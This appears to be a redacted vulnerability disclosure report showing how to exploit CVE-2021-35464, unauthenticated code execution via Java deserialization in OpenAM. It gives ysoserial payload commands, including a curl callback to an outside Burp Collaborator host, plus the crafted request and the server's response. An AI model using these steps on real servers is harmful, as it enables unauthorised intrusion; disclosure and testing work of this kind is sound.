RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.
An unauthenticated, 3rd-party attacker or adversary can execute remote code
βββββ
CVE-2021-35464
Target domain: βββββ
First we need to build the payload:
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
then
java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\n' > payload.txt
You need to change the burp Collaborator id to test it properly.
The payload is now saved in the payload.txt file.
Now we need to use the following request:
GET /ββββββββββ=XYZ HTTP/1.1
Host: 127.0.0.1
Replace XYZ by the payload saved into the payload.txt file.
The response
HTTP/1.1 302 302
Date: Thu, 01 Jul 2021 18:11:52 GMT
Server: Apache
Set-Cookie: session=expiry=1625163712945691;Max-Age=600;path=/;HttpOnly;Secure;
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Security-Policy: default-src 'unsafe-inline' 'self'; script-src 'unsafe-eval' 'unsafe-inline' 'self' https://ββββββββββ; img-src 'self' https://ββββββββ
Cache-Control: no-cache, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Cache-Control: private
Location: https://127.0.0.1:443/sso/base/AMInvalidURL
Content-Length: 0
X-XSS-Protection: 1; mode=block
The HTTP Request sent the collaborator :
βββββ